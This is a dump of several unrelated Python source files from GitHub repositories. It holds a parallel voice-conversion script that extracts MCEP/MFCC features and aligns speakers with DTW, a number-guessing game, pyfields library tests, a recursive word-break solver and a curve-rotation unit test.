extract_features, with multiple choice of choosing feature to extract. Default is mcep\n# TODO feat argument need to be implement as a list, support multiple feature-type return\ndef _extract_features(audiodatum, speaker, sr=16000, feat='mcep'):\n \"\"\"\n Note: this is file-based implementation for multiprocessing. Different from non-parallel version\n Feature extraction. For each type of feature, see corresponding case below\n Currently support: MCEP, MFCC. Will be updated when needed\n :param audiodatum: 162 files time-series data\n :param sr: sampling rate.\n :param feat: type of currently supported feature\n :return:\n \"\"\"\n if feat.lower() == 'mfcc':\n \"\"\"\n extract mfcc from audio time series data (from librosa.load)\n \"\"\"\n # mfcc = lbr.util.normalize(lbr.feature.mfcc(audiodatum, sr=sr, n_fft=frame_length, hop_length=hop_length), norm=1, axis=0)\n mfcc = lbr.feature.mfcc(audiodatum, sr=sr, n_fft=frame_length, hop_length=hop_length)\n\n # return np.stack(mfccs)\n return mfcc\n\n elif feat.lower() == 'mcep' or feat.lower() == 'mcc':\n \"\"\" \n MCEP is extracted via pysptk. 
See the link below for more details\n https://github.com/eYSIP-2017/eYSIP-2017_Speech_Spoofing_and_Verification/wiki/Feature-Extraction-for-Speech-Spoofing\n \n Example of using pysptk to extract mcep (copied from the above link): \n frameLength = 1024\n overlap = 0.25\n hop_length = frameLength * overlap\n order = 25\n alpha = 0.42\n gamma = -0.35\n \n sourceframes = librosa.util.frame(speech, frame_length=frameLength, hop_length=hop_length).astype(np.float64).T\n sourceframes *= pysptk.blackman(frameLength)\n sourcemcepvectors = np.apply_along_axis(pysptk.mcep, 1, sourceframes, order, alpha)\n \"\"\"\n # Check if data exists\n temp_filename = os.path.join(feature_path, \"{}_{}.pkl\".format(speaker, feat))\n\n frame = lbr.util.frame(audiodatum, frame_length=frame_length, hop_length=hop_length).T\n frame *= pysptk.blackman(frame_length)\n\n mcep = np.apply_along_axis(pysptk.mcep, 1, frame, order=order, alpha=alpha).T\n\n # Save to .pkl for later load\n # Move to calculating multiprocess call.\n # with open(temp_filename, \"wb\") as f:\n # pickle.dump(mceps, f, protocol=3)\n\n return mcep\n else:\n logging.critical('{} feature is not supported yet, exiting ...')\n exit()\n\n\ndef extract_features(audiodata, speaker, sr=16000, feat='mcep'):\n \"\"\"\n This will use multiprocess.Pool to parallel call _extract_features\n\n For example\n from multiprocessing import Pool\n p = Pool(5)\n def f(x):\n return x*x\n p.map(f, [1,2,3])\n\n :param audiodata:\n :param speaker:\n :param sr:\n :param feat:\n :return:\n \"\"\"\n # print(\"=======================\")\n logging.info(\"Extracting {} from {}'s data ...\".format(feat, speaker))\n temp_filename = os.path.join(feature_path, \"{}_{}.pkl\".format(speaker, feat))\n\n if os.path.isfile(temp_filename):\n logging.info(\"Found {}. Load data from {}_{}\".format(temp_filename, speaker, feat))\n\n with open(temp_filename, \"rb\") as f:\n return pickle.load(f), feat\n else:\n n_workers = int(cpu_rate * cpu_count())\n p = Pool(n_workers)\n\n results = p.starmap(_extract_features, zip(audiodata, itertools.repeat(speaker), itertools.repeat(sr), itertools.repeat(feat)))\n\n # print(feat)\n with open(temp_filename, \"wb\") as f:\n pickle.dump(results, f, protocol=3)\n\n return results, feat\n # raise NotImplementedError\n\n\n# EDIT 2018 Dec 17: This function will be removed. It will later be split to 3 separated function: `make_A`, `make_R`, `make_W`\n# See commit 4b0d1d716821934afb53b086bb9e351cc5d53f5b for \"before separating behavior\"\ndef make_dict_from_feat(feat_A, feat_B):\n \"\"\"\n Final function: return the \"dictionary\" of exemplars, which is construct by alignment of DTW\n Tentative: return a list, each item is a tuple size of 2, which is A and B, for src and tar speaker\n :param dtw_path: path[0], path[1]\n :return:\n \"\"\"\n dtw_paths = []\n\n for i in range(len(feat_A)):\n # dist, cost, cum_cost, path = dtw(feat_A[i].T, feat_B[i].T, lambda x, y: np.linalg.norm(x - y, ord=1))\n dist, path = fastdtw(feat_A[i].T, feat_B[i].T, dist=lambda x, y: np.linalg.norm(x - y, ord=1))\n dtw_paths.append(path)\n\n exemplars = []\n for idx_file, path in tqdm(enumerate(dtw_paths)):\n a = []\n b = []\n\n for it in range(len(path[0])):\n try:\n a.append(feat_A[idx_file].T[path[0][it]])\n b.append(feat_B[idx_file].T[path[1][it]])\n except Exception as e:\n input(\"Error occur. 
Press any key to exit ...\")\n exit()\n\n exemplars.append(np.stack([np.asarray(a), np.asarray(b)], axis=0))\n return exemplars\n\n\ndef _dtw_alignment(feat_A, feat_B):\n \"\"\"\n Note: this is file-based implementation for multiprocessing. Different from non-parallel version\n Calculate dtw_path, for constructing exemplar dictionaries (see make_exemplar_dict_A, R, W)\n :param feat_A: 1 audio file, with shape of (mel order, n_frames) (Note: not 162, this is function for parallel)\n :param feat_B: 1 audio file, with shape of (mel order, n_frames) (Note: not 162, this is function for parallel)\n :return: dtw path of 1 file\n \"\"\"\n logging.info(\"DTW on MCEP: Calculating warping function ...\")\n\n # dist, cost, cum_cost, path = dtw(feat_A.T, feat_B.T, lambda x, y: np.linalg.norm(x - y, ord=1))\n dist, cost, cum_cost, path = dtw(feat_A.T, feat_B.T, lambda x, y: sum(np.square(x - y)))\n\n return path\n\n\ndef dtw_alignment(feat_full_A, feat_full_B):\n \"\"\"\n This will use multiprocess.Pool to parallel call _dtw_alignment\n\n Calculate dtw_path, for constructing exemplar dictionaries (see make_exemplar_dict_A, R, W)\n :param feat_A: shape of (162 audio file, ...)\n :param feat_B: shape of (162 audio file, ...)\n :return: dtw path of 162 file\n \"\"\"\n logging.info(\"Parallel: DTW on MCEP: Calculating warping function ...\")\n\n # For parallel\n n_workers = int(cpu_rate * cpu_count())\n p = Pool(n_workers)\n dtw_paths = p.starmap(_dtw_alignment, zip(feat_full_A, feat_full_B))\n\n logging.info(\"Finish aligning. Warping mcep .... \")\n\n return dtw_paths, None, None\n\n # exemplars = []\n # full_A = []\n # full_B = []\n # for idx_file, path in tqdm(enumerate(dtw_paths)):\n # a = []\n # b = []\n #\n # for it in range(len(path[0])):\n # try:\n # a.append(feat_A[idx_file].T[path[0][it]])\n # b.append(feat_B[idx_file].T[path[1][it]])\n # except Exception as e:\n # input(\"Error occur. 
Press any key to exit ...\")\n # exit()\n #\n # full_A.append(np.asarray(a))\n # full_B.append(np.asarray(b))\n # # exemplars.append(np.stack([np.asarray(a), np.asarray(b)], axis=0))\n #\n # return dtw_paths, full_A, full_B\n\n\ndef make_exemplar_dict_A(dtw_paths, feat_A):\n \"\"\"\n :param feat_A: shape (162, ...)\n :param dtw_paths: shape (162 audio file, ...)\n :return: A_exemplar_dict.\n \"\"\"\n A_exemplars_dict = []\n\n for idx, path in enumerate(dtw_paths):\n temp = []\n for i in range(len(path[1])):\n temp.append(feat_A[idx][path[1][i]])\n\n A_exemplars_dict.append(np.asarray(temp))\n\n return A_exemplars_dict\n\n\ndef make_exemplar_dict_W(dtw_paths):\n return [path[0] for path in dtw_paths], [path[1] for path in dtw_paths]\n\n\ndef make_exemplar_dict_R(dtw_paths, feat_B):\n \"\"\"\n :param feat_A: shape (162, ...)\n :param dtw_paths: shape (162 audio file, ...)\n :return: A_exemplar_dict.\n \"\"\"\n R_exemplars_dict = []\n B_exemplars_dict = []\n\n for idx, path in enumerate(dtw_paths):\n temp = []\n for i in range(len(path[1])):\n temp.append(feat_B[idx][path[1][i]])\n\n B_exemplars_dict.append(np.asarray(temp))\n\n print(B_exemplars_dict[0].shape)\n for idx, exemplar in enumerate(B_exemplars_dict):\n temp = []\n for jjj in range(len(exemplar)):\n temp.append(np.exp(np.log(np.clip(feat_B[idx][jjj], 1e-10, None) - np.log(np.clip(exemplar[jjj], 1e-10, None)))))\n\n R_exemplars_dict.append(np.asarray(temp))\n\n return R_exemplars_dict\n\n# End of 2018 Dec 17 editing\n\n\n# EDIT: Add pickling exemplar dictionaries\ndef io_save_exemplar_dictionaries(exemplar_dict, protocol=3, savepath=\"data/vc/exem_dict\"):\n \"\"\"\n This function pickles every variables (exemplar dictionaries in this case) in args\n :param exemplar_dict:\n :param protocol:\n :param savepath:\n :return:\n \"\"\"\n os.system(\"mkdir -p {}\".format(savepath))\n\n for filename, value in exemplar_dict.items():\n with open(os.path.join(savepath, filename), \"wb\") as f:\n pickle.dump(value, f, protocol=protocol)\n\n logging.info(\"Done pickling warping function!!! Files are saved in data/vc/exem_dict/exemplar_W_A and B\")\n # raise NotImplementedError\n\n\ndef final_make_dict():\n # TODO should add argument to python call\n # TODO to specify which speaker to cover\n\n # Read audio time-series from npy\n logging.info(\"===================================================\")\n logging.info(\"Start reading audio time-series ...\")\n speakerAdata = io_read_speaker_data(data_path, speakerA, savetype='npy', parallel=True)[:nb_file]\n speakerBdata = io_read_speaker_data(data_path, speakerB, savetype='npy')[:nb_file]\n\n # Extract features from time-series FOR DTW-ALIGNMENT (f0, sp, ap is not included here)\n logging.info(\"===================================================\")\n logging.info(\"Start extracting mel feature for dtw alignment ...\")\n # feat_A, feat_type_A = extract_features(speakerAdata, speakerA, sr=sr, feat='mcep')\n # feat_B, feat_type_B = extract_features(speakerBdata, speakerB, sr=sr, feat='mcep')\n feat_A, feat_type_A = extract_features(speakerAdata, speakerA, sr=sr, feat='mfcc')\n feat_B, feat_type_B = extract_features(speakerBdata, speakerB, sr=sr, feat='mfcc')\n assert feat_type_A == feat_type_B, \"Inconsistent feature type. 2 speaker must have the same type of extracted features.\"\n\n # Get dtw path. 
Note that feat_A and feat_B will be transposed to (n_frames, mel-cepstral order) shape\n logging.info(\"===================================================\")\n logging.info(\"Start aligning (with dtw) ...\")\n dtw_paths, feat_A, feat_B = dtw_alignment(feat_A, feat_B)\n\n # exemplar_A = make_exemplar_dict_A(dtw_paths, feat_A)\n # exemplar_R = make_exemplar_dict_R(dtw_paths, feat_B)\n logging.info(\"===================================================\")\n exemplar_W_A, exemplar_W_B = make_exemplar_dict_W(dtw_paths)\n\n logging.info(\"Save dtw-paths to .pkl\")\n io_save_exemplar_dictionaries({\n # 'exemplar_A': exemplar_A,\n # 'exemplar_R': exemplar_R,\n 'exemplar_W_A': exemplar_W_A,\n 'exemplar_W_B': exemplar_W_B\n })\n\n # exemplars = make_dict_from_feat(feat_A, feat_B)\n # print(exemplars[0].shape, exemplars[1].shape)\n #\n # # Dump to npy\n # os.system(\"mkdir -p \" + feature_path)\n # # with open(os.path.join(feature_path, speakerA + \"2\" + speakerB + \"_mfcc_25ms_10ms_norm\" + \".pkl\"), \"wb\") as f:\n # with open(os.path.join(feature_path, \"{}2{}_{}_{}ms_{}ms.pkl\".format(\n # speakerA, speakerB, 'mcep', int(frame_length * 1000 / sr), int(hop_length * 1000 / sr))), \"wb\") as f:\n # pickle.dump(exemplars, f, protocol=3)\n\n # np.save(os.path.join(feature_path, speakerA + \"2\" + speakerB + \"_mfcc\" + \".npy\"), exemplars)\n\n\ndef debug_profiling_main():\n start = time.time()\n cProfile.run('final_make_dict()')\n logging.info(\"Elapsed time: {}\".format(time.time() - start))\n\n\nif __name__ == \"__main__\":\n final_make_dict()\n # cProfile.run('final_make_dict()', )\n","repo_name":"entn-at/exemplars_vc","sub_path":"01_make_dict_parallel.py","file_name":"01_make_dict_parallel.py","file_ext":"py","file_size_in_byte":14498,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"1733569132","text":"#Guess the number the computer has in mind.\nimport random\n\ndef guess(num,allowedCount):\n randomNum = random.randint(1, num)\n guess = 0\n count = 0\n while guess != randomNum and count != allowedCount:\n guess = int(input(\"Guess the number: \"))\n count += 1\n tries = allowedCount - count\n if guess < randomNum:\n print(f\"Guess again, value is too low. You have {tries} tries left!\")\n elif guess > randomNum:\n print(f\"Guess again, value is too high. You have {tries} tries left!\")\n if guess != randomNum and count == allowedCount:\n print(f\"Better Luck Next Time, the value was {randomNum}.\")\n else:\n print(f'Congratulations!!!, You have guessed {randomNum} correctly in {count} tries!!!')\n\ndef guessComp(num):\n low = 1\n high = num\n feedback = \"\"\n count = 0\n while feedback != \"c\":\n if low != high:\n guess = random.randint(low,high)\n else:\n guess = low\n count += 1\n feedback = input(f\"The computer guessed {guess}. 
is it higher(H), lower(L) or Correct(C)??\").lower()\n if feedback == 'h':\n high = guess - 1\n elif feedback == 'l':\n low = guess + 1\n print(f\"The computer found your number ({guess}) in {count} tries!!!\")\n\nprint(\"GUESS THE NUMBER\")\nprint('Select a level of difficulty \\n \\\npress 1 for Easy \\n \\\npress 2 for Medium \\n \\\npress 3 for Hard \\n\\n \\\npress 5 to play Computer guess your number')\n\ntry:\n level = int(input())\n if level == 1:\n print('Easy Difficulty - 1 to 10 \\n You have 3 Guesses.')\n guess(10,3)\n elif level == 2:\n print('Medium Difficulty - 1 to 40 \\n You have 5 Guesses.')\n guess(40,5)\n elif level ==3:\n print('Hard Difficulty - 1 to 100 \\n You have 5 Guesses.')\n guess(100,5)\n elif level == 5:\n high = int(input('Provide the range which include your number: '))\n guessComp(high)\n else:\n print(\"Please make a valid selection.\")\nexcept:\n print(\"Enter a valid input\")\n","repo_name":"InvisiblePro/Hacktoberfest-2022","sub_path":"Python/Guess_the_number.py","file_name":"Guess_the_number.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"53"} +{"seq_id":"34752264654","text":"import os\nimport sys\nimport timeit\n\nimport pytest\nfrom valid8 import ValidationError, ValidationFailure\n\nfrom pyfields import field, MandatoryFieldInitError, make_init, init_fields, ReadOnlyFieldError, NoneError, \\\n FieldTypeError, autoclass, get_fields\n\n\ndef test_lazy_fields():\n\n class Wall(object):\n height = field(doc=\"Height of the wall in mm.\") # type: int\n color = field(default='white', doc=\"Color of the wall.\") # type: str\n\n # create an instance\n w = Wall()\n\n # the field is visible in `dir`\n assert dir(w)[-2:] == ['color', 'height']\n\n # but not yet in `vars`\n assert vars(w) == dict()\n\n # lets ask for it - default value is affected\n print(w.color)\n\n # now it is in `vars` too\n assert vars(w) == {'color': 'white'}\n\n # mandatory field\n with pytest.raises(MandatoryFieldInitError) as exc_info:\n print(w.height)\n assert str(exc_info.value).startswith(\"Mandatory field 'height' has not been initialized yet on instance <\")\n\n w.height = 12\n assert vars(w) == {'color': 'white', 'height': 12}\n\n\n@pytest.mark.parametrize(\"use_decorator\", [False, True], ids=\"use_decorator={}\".format)\ndef test_default_factory(use_decorator):\n\n class BadPocket(object):\n items = field(default=[])\n\n p = BadPocket()\n p.items.append('thing')\n g = BadPocket()\n assert g.items == ['thing']\n\n if use_decorator:\n class Pocket:\n items = field()\n\n @items.default_factory\n def default_items(self):\n return []\n else:\n class Pocket(object):\n items = field(default_factory=lambda obj: [])\n\n p = Pocket()\n g = Pocket()\n p.items.append('thing')\n assert p.items == ['thing']\n assert g.items == []\n\n\ndef test_readonly_field():\n \"\"\" checks that the example in the readme is correct \"\"\"\n\n class User(object):\n name = field(read_only=True)\n\n u = User()\n u.name = \"john\"\n assert \"name: %s\" % u.name == \"name: john\"\n with pytest.raises(ReadOnlyFieldError) as exc_info:\n u.name = \"john2\"\n qualname = User.__dict__['name'].qualname\n assert str(exc_info.value) == \"Read-only field '%s' has already been \" \\\n \"initialized on instance %s and cannot be modified anymore.\" % (qualname, u)\n\n class User(object):\n name = field(read_only=True, default=\"dummy\")\n\n u = User()\n assert \"name: %s\" % u.name == \"name: dummy\"\n with 
pytest.raises(ReadOnlyFieldError):\n u.name = \"john\"\n\n\n@pytest.mark.parametrize(\"py36_style_type_hints\", [False, True], ids=\"py36_style_type_hints={}\".format)\ndef test_type_validation(py36_style_type_hints):\n if py36_style_type_hints:\n if sys.version_info < (3, 6):\n pytest.skip()\n Wall = None\n else:\n # import the test that uses python 3.6 type annotations\n from ._test_py36 import _test_readme_type_validation\n Wall = _test_readme_type_validation()\n else:\n class Wall(object):\n height = field(type_hint=int, check_type=True, doc=\"Height of the wall in mm.\")\n color = field(type_hint=str, check_type=True, default='white', doc=\"Color of the wall.\")\n\n w = Wall()\n w.height = 1\n with pytest.raises(TypeError):\n w.height = \"1\"\n\n\n@pytest.mark.parametrize(\"py36_style_type_hints\", [False, True], ids=\"py36_style_type_hints={}\".format)\ndef test_value_validation(py36_style_type_hints):\n colors = ('blue', 'red', 'white')\n\n if py36_style_type_hints:\n if sys.version_info < (3, 6):\n pytest.skip()\n Wall = None\n else:\n # import the test that uses python 3.6 type annotations\n from ._test_py36 import _test_readme_value_validation\n Wall = _test_readme_value_validation(colors)\n\n from mini_lambda import x\n from valid8.validation_lib import is_in\n\n class Wall(object):\n height = field(type_hint=int,\n validators={'should be a positive number': x > 0,\n 'should be a multiple of 100': x % 100 == 0},\n doc=\"Height of the wall in mm.\")\n color = field(type_hint=str,\n validators=is_in(colors),\n default='white', doc=\"Color of the wall.\")\n\n w = Wall()\n w.height = 100\n with pytest.raises(ValidationError) as exc_info:\n w.height = 1\n assert \"Successes: ['x > 0'] / Failures: {\" \\\n \"'x % 100 == 0': 'InvalidValue: should be a multiple of 100. Returned False.'\" \\\n \"}.\" in str(exc_info.value)\n\n with pytest.raises(ValidationError) as exc_info:\n w.color = 'magenta'\n assert \"NotInAllowedValues: x in ('blue', 'red', 'white') does not hold for x=magenta. Wrong value: 'magenta'.\" \\\n in str(exc_info.value)\n\n\n@pytest.mark.parametrize(\"py36_style_type_hints\", [False, True], ids=\"py36_style_type_hints={}\".format)\ndef test_value_validation_advanced(py36_style_type_hints):\n\n class InvalidWidth(ValidationFailure):\n help_msg = 'should be a multiple of the height ({height})'\n\n def validate_width(obj, width):\n if width % obj.height != 0:\n raise InvalidWidth(width, height=obj.height)\n\n if py36_style_type_hints:\n if sys.version_info < (3, 6):\n pytest.skip()\n Wall = None\n else:\n # import the test that uses python 3.6 type annotations\n from ._test_py36 import test_value_validation_advanced\n Wall = test_value_validation_advanced(validate_width)\n else:\n class Wall(object):\n height = field(type_hint=int,\n doc=\"Height of the wall in mm.\")\n width = field(type_hint=str,\n validators=validate_width,\n doc=\"Width of the wall in mm.\")\n\n w = Wall()\n w.height = 100\n w.width = 200\n\n with pytest.raises(ValidationError) as exc_info:\n w.width = 201\n assert \"InvalidWidth: should be a multiple of the height (100). 
Wrong value: 201.\" in str(exc_info.value)\n\ntry:\n from typing import Optional\n typing_present = True\nexcept ImportError:\n typing_present = False\n\n\n@pytest.mark.skipif(not typing_present, reason=\"typing module is not present\")\n@pytest.mark.parametrize(\"declaration\", ['typing', 'default_value', 'explicit_nonable'], ids=\"declaration={}\".format)\ndef test_nonable_fields(declaration):\n \"\"\"Tests that nonable fields are supported and correctly handled\"\"\"\n\n if declaration == 'typing':\n from typing import Optional\n \n class Foo(object):\n a = field(type_hint=Optional[int], check_type=True)\n b = field(type_hint=Optional[int], validators={'is positive': lambda x: x > 0})\n c = field(nonable=False, check_type=True)\n d = field(validators={'accept_all': lambda x: True})\n e = field(nonable=False)\n\n elif declaration == 'default_value':\n class Foo(object):\n a = field(type_hint=int, default=None, check_type=True)\n b = field(type_hint=int, default=None, validators={'is positive': lambda x: x > 0})\n c = field(nonable=False, check_type=True)\n d = field(validators={'accept_all': lambda x: True})\n e = field(nonable=False)\n\n elif declaration == 'explicit_nonable':\n class Foo(object):\n a = field(type_hint=int, nonable=True, check_type=True)\n b = field(type_hint=int, nonable=True, validators={'is positive': lambda x: x > 0})\n c = field(nonable=False, check_type=True)\n d = field(validators={'accept_all': lambda x: True})\n e = field(nonable=False)\n\n else:\n raise ValueError(declaration)\n\n f = Foo()\n f.a = None\n f.b = None\n with pytest.raises(NoneError):\n f.c = None\n f.d = None\n f.e = None\n assert vars(f) == {'_a': None, '_b': None, '_d': None, 'e': None}\n\n\ndef test_native_descriptors():\n \"\"\"\"\"\"\n class Foo:\n a = field()\n b = field(native=False)\n\n a_name = \"test_native_descriptors..Foo.a\" if sys.version_info >= (3, 6) else \".None\"\n b_name = \"test_native_descriptors..Foo.b\" if sys.version_info >= (3, 6) else \".None\"\n assert repr(Foo.__dict__['a']) == \"\" % a_name\n assert repr(Foo.__dict__['b']) == \"\" % b_name\n\n f = Foo()\n\n def set_native(): f.a = 12\n\n def set_descript(): f.b = 12\n\n def set_pynative(): f.c = 12\n\n # make sure that the access time for native field and native are identical\n # --get rid of the first init since it is a bit longer (replacement of the descriptor with a native field\n set_native()\n set_descript()\n set_pynative()\n\n # --now compare the executiong= times\n t_native = timeit.Timer(set_native).timeit(10000000)\n t_descript = timeit.Timer(set_descript).timeit(10000000)\n t_pynative = timeit.Timer(set_pynative).timeit(10000000)\n\n print(\"Average time (ns) setting the field:\")\n print(\"%0.2f (normal python) ; %0.2f (native field) ; %0.2f (descriptor field)\"\n % (t_pynative, t_native, t_descript))\n\n ratio = t_native / t_pynative\n print(\"Ratio is %.2f\" % ratio)\n assert ratio <= 1.2\n\n\n# def decompose(number):\n# \"\"\" decompose a number in scientific notation. 
from https://stackoverflow.com/a/45359185/7262247\"\"\"\n# (sign, digits, exponent) = Decimal(number).as_tuple()\n# fexp = len(digits) + exponent - 1\n# fman = Decimal(number).scaleb(-fexp).normalize()\n# return fman, fexp\n\n\ndef test_make_init_full_defaults():\n class Wall:\n height = field(doc=\"Height of the wall in mm.\") # type: int\n color = field(default='white', doc=\"Color of the wall.\") # type: str\n __init__ = make_init()\n\n # create an instance\n help(Wall)\n with pytest.raises(TypeError) as exc_info:\n Wall()\n assert str(exc_info.value).startswith(\"__init__()\")\n\n w = Wall(2)\n assert vars(w) == {'color': 'white', 'height': 2}\n\n w = Wall(color='blue', height=12)\n assert vars(w) == {'color': 'blue', 'height': 12}\n\n\ndef test_make_init_with_explicit_list():\n class Wall:\n height = field(doc=\"Height of the wall in mm.\") # type: int\n color = field(default='white', doc=\"Color of the wall.\") # type: str\n\n # only `height` will be in the constructor\n __init__ = make_init(height)\n\n with pytest.raises(TypeError) as exc_info:\n Wall(1, 'blue')\n assert str(exc_info.value).startswith(\"__init__()\")\n\n\ndef test_make_init_with_inheritance():\n class Wall:\n height = field(doc=\"Height of the wall in mm.\") # type: int\n __init__ = make_init(height)\n\n class ColoredWall(Wall):\n color = field(default='white', doc=\"Color of the wall.\") # type: str\n __init__ = make_init(Wall.height, color)\n\n w = ColoredWall(2)\n assert vars(w) == {'color': 'white', 'height': 2}\n\n w = ColoredWall(color='blue', height=12)\n assert vars(w) == {'color': 'blue', 'height': 12}\n\n\ndef test_make_init_callback():\n class Wall:\n height = field(doc=\"Height of the wall in mm.\") # type: int\n color = field(default='white', doc=\"Color of the wall.\") # type: str\n\n def post_init(self, msg='hello'):\n \"\"\"\n After initialization, some print message is done\n :param msg: the message details to add\n :return:\n \"\"\"\n print(\"post init ! height=%s, color=%s, msg=%s\" % (self.height, self.color, msg))\n self.non_field_attr = msg\n\n # only `height` and `foo` will be in the constructor\n __init__ = make_init(height, post_init_fun=post_init)\n\n w = Wall(1, 'hey')\n assert vars(w) == {'color': 'white', 'height': 1, 'non_field_attr': 'hey'}\n\n\ndef test_init_fields():\n class Wall:\n height = field(doc=\"Height of the wall in mm.\") # type: int\n color = field(default='white', doc=\"Color of the wall.\") # type: str\n\n @init_fields\n def __init__(self, msg='hello'):\n \"\"\"\n After initialization, some print message is done\n :param msg: the message details to add\n :return:\n \"\"\"\n print(\"post init ! 
height=%s, color=%s, msg=%s\" % (self.height, self.color, msg))\n self.non_field_attr = msg\n\n # create an instance\n help(Wall.__init__)\n with pytest.raises(TypeError) as exc_info:\n Wall()\n assert str(exc_info.value).startswith(\"__init__()\")\n\n w = Wall(2)\n assert vars(w) == {'color': 'white', 'height': 2, 'non_field_attr': 'hello'}\n\n w = Wall(msg='hey', color='blue', height=12)\n assert vars(w) == {'color': 'blue', 'height': 12, 'non_field_attr': 'hey'}\n\n\nno_type_checker = False\ntry:\n import typeguard\nexcept ImportError:\n try:\n import pytypes\n except ImportError:\n no_type_checker = True\n\n\n@pytest.mark.skipif(sys.version_info < (3, 6), reason=\"python < 3.6 does not support class member type hints\")\n@pytest.mark.skipif(no_type_checker, reason=\"no type checker is installed\")\ndef test_autofields_readme():\n \"\"\"Test for readme on autofields\"\"\"\n\n from ._test_py36 import _test_autofields_readme\n Pocket, Item, Pocket2 = _test_autofields_readme()\n\n with pytest.raises(TypeError):\n Item()\n\n item1 = Item(name='1')\n pocket1 = Pocket(size=2)\n pocket2 = Pocket(size=2)\n\n # make sure that custom constructor is not overridden by @autofields\n pocket3 = Pocket2(\"world\")\n with pytest.raises(MandatoryFieldInitError):\n pocket3.size\n\n # make sure the items list is not the same in both (if we add the item to one, they do not appear in the 2d)\n assert pocket1.size == 2\n assert pocket1.items is not pocket2.items\n pocket1.items.append(item1)\n assert len(pocket2.items) == 0\n\n\ntry:\n import pytypes\nexcept ImportError:\n has_pytypes = False\nelse:\n has_pytypes = True\n\n\n@pytest.mark.skipif(has_pytypes, reason=\"pytypes does not correctly support vtypes - \"\n \"see https://github.com/Stewori/pytypes/issues/86\")\n@pytest.mark.skipif(sys.version_info < (3, 6), reason=\"python < 3.6 does not support class member type hints\")\ndef test_autofields_vtypes_readme():\n\n from ._test_py36 import _test_autofields_vtypes_readme\n Rectangle = _test_autofields_vtypes_readme()\n\n r = Rectangle(1, 2)\n with pytest.raises(FieldTypeError):\n Rectangle(1, -2)\n with pytest.raises(FieldTypeError):\n Rectangle('1', 2)\n\n\ndef test_autoclass():\n \"\"\" Tests the example with autoclass in the doc \"\"\"\n @autoclass\n class Foo(object):\n msg = field(type_hint=str)\n age = field(default=12, type_hint=int)\n\n foo = Foo(msg='hello')\n\n assert [f.name for f in get_fields(Foo)] == ['msg', 'age']\n\n print(foo) # automatic string representation\n print(foo.to_dict()) # dict view\n\n assert str(foo) == \"Foo(msg='hello', age=12)\"\n assert str(foo.to_dict()) in (\"{'msg': 'hello', 'age': 12}\", \"{'age': 12, 'msg': 'hello'}\")\n assert foo == Foo(msg='hello', age=12) # comparison (equality)\n assert foo == {'msg': 'hello', 'age': 12} # comparison with dicts\n\n\n@pytest.mark.skipif(sys.version_info < (3, 6), reason=\"not valid for old python\")\ndef test_autoclass_2():\n from ._test_py36 import _test_autoclass2\n Foo = _test_autoclass2()\n\n # assert [f.name for f in get_fields(Foo)] == ['msg', 'age', 'height']\n\n foo = Foo(msg='hello')\n\n assert repr(foo) == \"Foo(msg='hello', age=12, height=50)\" # automatic string representation\n assert str(foo.to_dict()) # automatic dict view\n\n assert foo == Foo(msg='hello', age=12, height=50) # automatic equality comparison\n assert foo == {'msg': 'hello', 'age': 12, 'height': 50} # automatic eq comparison with dicts\n\n\n@pytest.mark.skipif(sys.version_info < (3, 6), reason=\"not valid for old python\")\ndef test_autoclass_3():\n 
from ._test_py36 import _test_autoclass3\n Foo = _test_autoclass3()\n\n # assert [f.name for f in get_fields(Foo)] == ['msg', 'age', 'height']\n\n foo = Foo(msg='hello')\n\n with pytest.raises(AttributeError):\n foo.to_dict() # method does not exist\n\n assert repr(foo) == \"Foo(msg='hello', age=12, height=50)\" # automatic string representation\n assert foo == Foo(msg='hello', age=12, height=50) # automatic equality comparison\n\n # type checking ON\n with pytest.raises(FieldTypeError):\n foo.msg = 1\n","repo_name":"smarie/python-pyfields","sub_path":"pyfields/tests/test_readme.py","file_name":"test_readme.py","file_ext":"py","file_size_in_byte":16554,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"53"} +{"seq_id":"21352462697","text":"# !/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nvocab = [\"mobile\",\"samsung\",\"sam\",\"sung\",\n \"man\",\"mango\",\"icecream\",\"and\",\n \"go\",\"i\",\"like\",\"ice\",\"cream\"]\n\ndef f(inp):\n n = len(inp)\n if n == 0:\n return True\n for i in range(n+1):\n if inp[0:i] in vocab and f(inp[i:]):\n return True\n return False\n \n \ninp = 'ilikesamsungandicecream'\nprint(f(inp))\n","repo_name":"SeanLee97/datastruct_and_algorithms","sub_path":"dp/Word_Break/recursive.py","file_name":"recursive.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"} +{"seq_id":"20871611792","text":"import unittest\nfrom numpy import cos, log, pi as PI, sin\n\nfrom numeric.e2.rotation import Rotation\n\n\nclass BasicTestSuite(unittest.TestCase):\n\n def f(self, x):\n return sin(x)\n\n interval = [PI, 7 * PI]\n angle = PI / 8\n x = 3\n\n def test_rotated_interval(self):\n\n rotation = Rotation(self.f, self.interval, self.angle)\n interval_rotated = rotation.get_interval_after_rotation()\n left_expected = self.interval[0] * cos(self.angle) - self.f(self.interval[0]) * sin(self.angle)\n right_expected = self.interval[1] * cos(self.angle) - self.f(self.interval[1]) * sin(self.angle)\n self.assertAlmostEqual(left_expected, interval_rotated[0])\n self.assertAlmostEqual(right_expected, interval_rotated[1])\n\n def test_point_before_rotation(self):\n expected_point_before_rotation = [self.x, self.f(self.x)]\n expected_point_after_rotation = [self.x * cos(self.angle) - self.f(self.x) * sin(self.angle),\n self.x * sin(self.angle) + self.f(self.x) * cos(self.angle)]\n\n rotation = Rotation(self.f, self.interval, self.angle)\n rotation.approximate_rotated_y(expected_point_after_rotation[0])\n actual_point_before_rotation = rotation.get_point_before_rotation()\n\n self.assertAlmostEqual(expected_point_before_rotation[0], actual_point_before_rotation[0])\n self.assertAlmostEqual(expected_point_before_rotation[1], actual_point_before_rotation[1])\n\n def test_point_after_rotation(self):\n expected_point_after_rotation = [self.x * cos(self.angle) - self.f(self.x) * sin(self.angle),\n self.x * sin(self.angle) + self.f(self.x) * cos(self.angle)]\n\n rotation = Rotation(self.f, self.interval, self.angle)\n rotation.approximate_rotated_y(expected_point_after_rotation[0])\n actual_point_after_rotation = rotation.get_point_after_rotation()\n\n self.assertAlmostEqual(expected_point_after_rotation[0], actual_point_after_rotation[0])\n self.assertAlmostEqual(expected_point_after_rotation[1], 